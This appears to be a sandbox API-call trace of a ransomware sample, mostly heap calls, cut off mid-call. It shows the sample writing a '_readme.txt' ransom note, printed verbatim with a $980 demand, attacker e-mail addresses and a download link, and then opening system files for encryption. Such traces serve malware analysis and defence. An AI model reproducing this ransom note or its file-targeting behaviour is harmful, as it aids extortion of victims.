[0188.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.137] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0188.137] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.138] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.138] PathFindFileNameW (pszPath="") returned="" [0188.138] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.138] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.139] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.139] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.139] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0188.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.139] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0188.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.140] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.140] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.140] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.141] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*" (normalized: "c:\\boot\\fi-fi\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.142] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.142] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.142] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned=".mui" [0188.142] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.144] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.144] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.145] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.145] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.150] HeapFree (in: hHeap=0x620000, 